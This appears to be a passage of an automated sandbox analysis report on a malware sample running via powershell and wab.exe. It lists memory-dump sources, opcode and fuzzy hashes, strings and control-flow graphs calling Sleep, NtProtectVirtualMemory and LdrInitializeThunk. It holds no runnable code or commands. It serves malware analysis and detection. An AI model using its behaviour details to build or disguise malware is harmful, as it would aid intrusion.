                                                  • Opcode Fuzzy Hash: 36061b60ebb369c5194c1034bf43acc254f1d8bc7267032a65f9f51780ae2e55
                                                  • Instruction Fuzzy Hash: 8F1198B5315286EFD7258B14D841AE97B75FBC2318B198077D9088B1D1E732C805C751
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: \V3k
                                                  • API String ID: 0-3869630692
                                                  • Opcode ID: 52075b2c0818ba17a89660e20c59544e2731eb2f5d1e8eb809480c3770aabb44
                                                  • Instruction ID: d6b3a12ad1d387c318b3f5753e2ed0bd42de631e85090ade33d5a0d5d121ea51
                                                  • Opcode Fuzzy Hash: 52075b2c0818ba17a89660e20c59544e2731eb2f5d1e8eb809480c3770aabb44
                                                  • Instruction Fuzzy Hash: 50B15D70E00219DFDB20CFA9D8857AEBBF2BF48705F148529E815A7395EB34A845CF81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tPq
                                                  • API String ID: 0-789928099
                                                  • Opcode ID: 4300d74f70dff54c3302970bd90df2171485d57db8c7ed6fb7f363a5ea35b62b
                                                  • Instruction ID: a591702ba977068ff74fe559f5e53fc47fc5ef1c52b0817cbe2f263f27eb7513
                                                  • Opcode Fuzzy Hash: 4300d74f70dff54c3302970bd90df2171485d57db8c7ed6fb7f363a5ea35b62b
                                                  • Instruction Fuzzy Hash: DE51C0B0A09385AFC712CB64D851A99BFB1BF46208F1A84EBD444CF293C735DC45C7A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q
                                                  • API String ID: 0-1807707664
                                                  • Opcode ID: 3646f4b2e4dabe3b8189e6ddf161c67ed9491f7d421e082ebe9643f5171ebb2d
                                                  • Instruction ID: ce5e7a10806abdeb8abd0572dace08a3ce8c715627f8c05ab14e3ff88a142f59
                                                  • Opcode Fuzzy Hash: 3646f4b2e4dabe3b8189e6ddf161c67ed9491f7d421e082ebe9643f5171ebb2d
                                                  • Instruction Fuzzy Hash: AE21F5F5B00212EBDB245A2485037FEBAA2BFC4250F14447BC9159B381DB36E94687E1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q
                                                  • API String ID: 0-1807707664
                                                  • Opcode ID: dc49a89997f228c83046913fdba1315a229140e9147947b76be7551238f0d7fc
                                                  • Instruction ID: a1c6cf45c11eeca0e49c3f3c741268fa1d6a9981cfabee92ffc3dae39da91f24
                                                  • Opcode Fuzzy Hash: dc49a89997f228c83046913fdba1315a229140e9147947b76be7551238f0d7fc
                                                  • Instruction Fuzzy Hash: 942105F0B00222BBDB245A6485037FEBAA2BFC4340F54447BD9149B380DB36E84687E2
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 684c0ac8edc527cc290d3edc1d074276a9db2e805909d8f5a7fafa277bd6d5f1
                                                  • Instruction ID: 3f6257f03c62cc87a8f9b38cdd975cee1edb352698750d5aa952822f4aaca550
                                                  • Opcode Fuzzy Hash: 684c0ac8edc527cc290d3edc1d074276a9db2e805909d8f5a7fafa277bd6d5f1
                                                  • Instruction Fuzzy Hash: 77626AB4B00215EFDB24CB98C550E9EBBB2BB88304F25C46AD9099F755DB72EC46CB41
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bb936c90e2e550383aeac6ec7fa37d696fd8c10ce5d66e5379e1f56cc0f018d8
                                                  • Instruction ID: 0331425976194173a3b21afc1578b41207b9bac2b62288b343540393a28e5af4
                                                  • Opcode Fuzzy Hash: bb936c90e2e550383aeac6ec7fa37d696fd8c10ce5d66e5379e1f56cc0f018d8
                                                  • Instruction Fuzzy Hash: 7E3248B4A00215EFDB24CF98C540E9EBBB2BB84314F25C4AAD9099F756D772EC46CB41
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ee19e0ab5620e3e191e4f3a85d1b4a3b47faaf2226c5644aa259419e9eae3262
                                                  • Instruction ID: e38787535468c48971c6bca23458120edc47cb572aa06545d9e71a70cffd8b00
                                                  • Opcode Fuzzy Hash: ee19e0ab5620e3e191e4f3a85d1b4a3b47faaf2226c5644aa259419e9eae3262
                                                  • Instruction Fuzzy Hash: 8C125AB4A00215EFDB24CF94C550E9EBBB2BB84304F25C4AAE9099F756D772EC46CB41
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cc5d9da85ef2f44c10e0fc396ea002754cbb6ec4fedd00228b7e9a00c927cf3f
                                                  • Instruction ID: 5168a3177e8388f7130add9245b0ffed921df21aa1f78bcfe0cf0301adca11b3
                                                  • Opcode Fuzzy Hash: cc5d9da85ef2f44c10e0fc396ea002754cbb6ec4fedd00228b7e9a00c927cf3f
                                                  • Instruction Fuzzy Hash: CAD1F574E01249EFDB15CFA8D484A9DFBB2BF48315F248159E804AB362C735ED86CB90
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9810c13e51b0209627dc5d532f1d481e0d1aec2acc848a8377e4d451d1d290aa
                                                  • Instruction ID: 4f6e87f3efe353a44d0542568e57db926ede0897ff37e082deea9d6703a95f05
                                                  • Opcode Fuzzy Hash: 9810c13e51b0209627dc5d532f1d481e0d1aec2acc848a8377e4d451d1d290aa
                                                  • Instruction Fuzzy Hash: 98A19C75A00209DFDB14EFA4C984A9DBBF2FF84305F118558E802AB366DB74AC49DB81
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b53043a912b93043e275431aa79a0acd3115b91006d521decfbf1ae31a6db903
                                                  • Instruction ID: ddafcf33d33405b381c8545911793f85091b81bc10a8986279c8b1009592a425
                                                  • Opcode Fuzzy Hash: b53043a912b93043e275431aa79a0acd3115b91006d521decfbf1ae31a6db903
                                                  • Instruction Fuzzy Hash: BAB15C70E00209DFDB20CFA9D9857DDBBF1AF48355F248529E814AB395EB74A885CB81
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4c21e76e1ffb2853c9a51d406be1598824ab622e4d97d3f4edabe6e68e4f7012
                                                  • Instruction ID: 3d0107bbb1cd9a7983b301ae0e95b7e354ea9338000c7a90a4ace04faaf9a76b
                                                  • Opcode Fuzzy Hash: 4c21e76e1ffb2853c9a51d406be1598824ab622e4d97d3f4edabe6e68e4f7012
                                                  • Instruction Fuzzy Hash: 0B91E134A05204DFCB14DFA8D844AADBBF2FF89315F158969E441AB362CB35EC86CB51
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4ac2f7b2a3dea44ce33ae73a361e80015fc95371dc65ca9a0f6e95192a8f8396
                                                  • Instruction ID: 13417b866a521936c56feb689c156de3fe855816170eb3baa596638042ed6f39
                                                  • Opcode Fuzzy Hash: 4ac2f7b2a3dea44ce33ae73a361e80015fc95371dc65ca9a0f6e95192a8f8396
                                                  • Instruction Fuzzy Hash: 77918E74A006058FCB15CF59C494AAEFBB1FF89310B248599E855EB3A6C735FC91CBA0
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 42b94ef991fd9a8cc4bfcdbbe27a97e61d01acb024ab30b3248d9b8d9f2087c5
                                                  • Instruction ID: ab4e0ed75a9b0ecd52a8d2774fd390763973f0c388565e154b8abeeee8a89dae
                                                  • Opcode Fuzzy Hash: 42b94ef991fd9a8cc4bfcdbbe27a97e61d01acb024ab30b3248d9b8d9f2087c5
                                                  • Instruction Fuzzy Hash: F4814AB8A00245EFDB14CF58D582ADDBBB2BF89314F14886AD905AB351C732EC42CF61
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d7a19788ed9fab7d112cc715b4e3e6fcb0efca1185444b1c8af43bcfda89cfe8
                                                  • Instruction ID: cdcf5bee73df33f269ba199daf2e8f25957d8705d2983dda07c468fba4c72801
                                                  • Opcode Fuzzy Hash: d7a19788ed9fab7d112cc715b4e3e6fcb0efca1185444b1c8af43bcfda89cfe8
                                                  • Instruction Fuzzy Hash: 32813AB8A00245EFDB14CF58D586A9DBBB2BF88314F14C46AD905AB351C732EC42CF61
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a8b65c12d837520e8f3327bf7e0130e87ed6bd9093d7b8cc51cf2af579a0c62c
                                                  • Instruction ID: 5ded83858862999d6a7f6969e5e832f47951427af69ca8314eba2f872ce4a99e
                                                  • Opcode Fuzzy Hash: a8b65c12d837520e8f3327bf7e0130e87ed6bd9093d7b8cc51cf2af579a0c62c
                                                  • Instruction Fuzzy Hash: 56719D70A00209CFDB14DF68C884A9DBBF6FF85315F14852AD515EB791DBB4AC46CB80
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 897d8afeb3c7dbc9c825541e33d17d9c4679884be2391461feb1ee0660180565
                                                  • Instruction ID: 57837c1d10229b8c522dd23e00984766b88a175b3108486eb913bb24e0a04bc6
                                                  • Opcode Fuzzy Hash: 897d8afeb3c7dbc9c825541e33d17d9c4679884be2391461feb1ee0660180565
                                                  • Instruction Fuzzy Hash: DC712BB4A00208DFDB14DFA5D884BADBBF2BF88305F148429D511AB791DB75AD4ACF41
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 327f1955f3a37dcf0c2db544896c6cd0322a1c72734270bc9cf49ded32f17636
                                                  • Instruction ID: 036c22123954d96c0f6b8025f6090b41f4ec0a58b2deae43b9828c28ab5e23c4
                                                  • Opcode Fuzzy Hash: 327f1955f3a37dcf0c2db544896c6cd0322a1c72734270bc9cf49ded32f17636
                                                  • Instruction Fuzzy Hash: 494159B0A00609DFDB24DFA5C88469DBBF2FF89315F148529D416AB791DBB4AC46CF80
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c4c030d16a3840d14d25a1ded9e7c63a381093d4c7fcbe4aef079440c62a1cc6
                                                  • Instruction ID: aaba3756c1fce093aca355e330aa12fe0f97ee188280cd9cbeca4ae7293fdad8
                                                  • Opcode Fuzzy Hash: c4c030d16a3840d14d25a1ded9e7c63a381093d4c7fcbe4aef079440c62a1cc6
                                                  • Instruction Fuzzy Hash: F441BEB1B00604CFDB14DFA4C958AAA7BF2FF88751F084068E506EB7A1CB75AC45CB90
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a8412b167e690facd42a70067ba65c69795a8b522ba17b11e2ea3dbbb80d483e
                                                  • Instruction ID: 40de078d4dd942e6328e60381b1086083d87c89509c65707e7f9d980d22cf106
                                                  • Opcode Fuzzy Hash: a8412b167e690facd42a70067ba65c69795a8b522ba17b11e2ea3dbbb80d483e
                                                  • Instruction Fuzzy Hash: 27415A74A106058FCB15CF59C494EAAFBB1FF48310B158599D815AB3A6C736FC91CBA0
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9b873e89cde9526f74c73827517f891ab6d2ebfa1375d629300b5a5630dce26b
                                                  • Instruction ID: 7d1d6146ea2da6d16549867731e28ffa61cd76c89603daa92a870c26542ab435
                                                  • Opcode Fuzzy Hash: 9b873e89cde9526f74c73827517f891ab6d2ebfa1375d629300b5a5630dce26b
                                                  • Instruction Fuzzy Hash: 8431A9B4B50204AFE7189B60C954BEE7AA3BBC4380F10C829EA056F7D1CF75DC428B95
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fdb1e392658e1312eb80ba55e3df7fa2fc41dc7d169ab2c7b64ffd7a676b5a87
                                                  • Instruction ID: 342bbcc65d070b73a994677d7dfdd1722c842f8d6d44ae25fbb415fc83032fad

                                                  Execution Graph

                                                  Execution Coverage: 0.9%
                                                  Dynamic/Decrypted Code Coverage: 55.6%
                                                  Signature Coverage: 66.7%
                                                  Total number of Nodes: 9
                                                  Total number of Limit Nodes: 1
                                                  Execution graph (rendered image): a loop between 3c32542 and 3c32586 that calls Sleep (3c325a4) and NtProtectVirtualMemory (3c325b1), plus two entry points at 22542c70 and 22542c00 (via 22542c0a) that call LdrInitializeThunk.

                                                  Callgraph

                                                  Callgraph (rendered image; legend: Executed / Not Executed, opacity indicates relevance, disassembly available): 107 functions in the 224Dxxxx, 2254xxxx and 03C3xxxx ranges, with the edges Function_03C32542 -> Function_03C31DC2 and Function_22542C00 -> Function_22542C0A; the full function list is not reproduced here.

                                                  Control-flow Graph

                                                  APIs
                                                  • Sleep.KERNELBASE(00000005), ref: 03C325A7
                                                  • NtProtectVirtualMemory.NTDLL(?,-0000101C,-00000018), ref: 03C325FA
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1843095733.00000000036C7000.00000040.00000400.00020000.00000000.sdmp, Offset: 036C7000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_36c7000_wab.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MemoryProtectSleepVirtual
                                                  • String ID:
                                                  • API String ID: 3235210055-0

                                                  Control-flow Graph
                                                  • control_flow_graph 13 22542c70-22542c7c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 42f7470fbe142f24f931a076684c12b682b3ff128136cbee2ed24a961de308a8
                                                  • Instruction ID: 1badb61fd057462a4e3f25efb5803c25ec3579f277c93b8b58d602e9ae7eeb02
                                                  • Opcode Fuzzy Hash: 42f7470fbe142f24f931a076684c12b682b3ff128136cbee2ed24a961de308a8
                                                  • Instruction Fuzzy Hash: 6A90023120158802D1107158C44878A004547D0311F9DC412B4424618D869989E17521

                                                  Control-flow Graph
                                                  • control_flow_graph 15 225435c0-225435cc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 945b255aaf0afc30a1d06747038f73d7a832f614c4d587cb076cfa6952cc7817
                                                  • Instruction ID: c55c5bd55cabf0cc59a8aa504c98d2a0e32f9792fa444358323c372149fee9ac
                                                  • Opcode Fuzzy Hash: 945b255aaf0afc30a1d06747038f73d7a832f614c4d587cb076cfa6952cc7817
                                                  • Instruction Fuzzy Hash: 7090023160560402D10071588558746104547D0211FA9C412B0424528D87998AA169A2

                                                  Control-flow Graph
                                                  • control_flow_graph 14 22542df0-22542dfc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: e5de213c4bc1f042ceb115e280cd5652266c35da12fa3f3f14ff07ae96d28f04
                                                  • Instruction ID: 2fa6fa8e8f012cd93026e055cfbe2f312336a054586add435772debb9cf71254
                                                  • Opcode Fuzzy Hash: e5de213c4bc1f042ceb115e280cd5652266c35da12fa3f3f14ff07ae96d28f04
                                                  • Instruction Fuzzy Hash: 5190023120150413D11171588548747004947D0251FD9C413B0424518D965A8AA2A521

                                                  Control-flow Graph
                                                  • control_flow_graph 9 22542c0a-22542c0f 10 22542c11-22542c18 9->10 11 22542c1f-22542c26 LdrInitializeThunk 9->11
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 4b2ec7dfed75eece1f22fb75eb35ba03d92c02a3d09af71d5a6932ea621e5056
                                                  • Instruction ID: f5fe4231477fbcc7a1418c79dc6ff32e9b064697eed944c21bbce62594cdfc71
                                                  • Opcode Fuzzy Hash: 4b2ec7dfed75eece1f22fb75eb35ba03d92c02a3d09af71d5a6932ea621e5056
                                                  • Instruction Fuzzy Hash: 56B09B71D016D5D5D601E7604B0C7177D4067D0711F59C062F2034641F477CC2D1E575
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4fbe93db8b5cb86dc6e35e2a8218b368e47cc18984753b70b9ebc9ded9ac26d9
                                                  • Instruction ID: 8718294824f6cd6ab3eb39aeb7bcadf81cc70829be0639e2540363b64ec0cf0c
                                                  • Opcode Fuzzy Hash: 4fbe93db8b5cb86dc6e35e2a8218b368e47cc18984753b70b9ebc9ded9ac26d9
                                                  • Instruction Fuzzy Hash: D590026160160042414071588848446604557E13113D9C116B0554520C861C89A59669
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3a1598ce6c40f449be0e57d2da8e3f31fbd29a490ca2e2e454108c43afa6295a
                                                  • Instruction ID: c256dcd681083155903d7d848cf9103def2aa05c2de784b4b6c74f2431240c86
                                                  • Opcode Fuzzy Hash: 3a1598ce6c40f449be0e57d2da8e3f31fbd29a490ca2e2e454108c43afa6295a
                                                  • Instruction Fuzzy Hash: 60900231605900129140715888C8586404557E0311B99C012F0424514C8A188AA65761
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2d95b6c25671dce8f8dc67246cef04da2be142edef3207ea49602300b282b33
                                                  • Instruction ID: c9c57f62be006535a56bb8ff8a1773545657285f0c6cfd787717ec1d939ac285
                                                  • Opcode Fuzzy Hash: b2d95b6c25671dce8f8dc67246cef04da2be142edef3207ea49602300b282b33
                                                  • Instruction Fuzzy Hash: 5F90023520150402D51071589848686008647D0311F99D412B0424518D865889F1A521
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bbe5c03c66138aab2e3141d84b0777b87ea21cb60bf648d4fa65b935b36348bd
                                                  • Instruction ID: ddc1335de9d7a16a603a4a662bbf06422a2e7fa81223eaf0ab29b4d46b0a59e9
                                                  • Opcode Fuzzy Hash: bbe5c03c66138aab2e3141d84b0777b87ea21cb60bf648d4fa65b935b36348bd
                                                  • Instruction Fuzzy Hash: 6C90023120150842D10071588448B86004547E0311F99C017B0124614D8619C9A17921
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1995bd7fc460e55bc2d3834d8c95cc3050d057cc9d7d54a0cd9493cc43daeb2b
                                                  • Instruction ID: 5fd61aa6b9761add7174fa97b3165aab8070f88583fe42fa4406c0d22451de0b
                                                  • Opcode Fuzzy Hash: 1995bd7fc460e55bc2d3834d8c95cc3050d057cc9d7d54a0cd9493cc43daeb2b
                                                  • Instruction Fuzzy Hash: 8690026120250003410571588458656404A47E0211B99C022F1014550DC52989E16525
                                                  Memory Dump Source
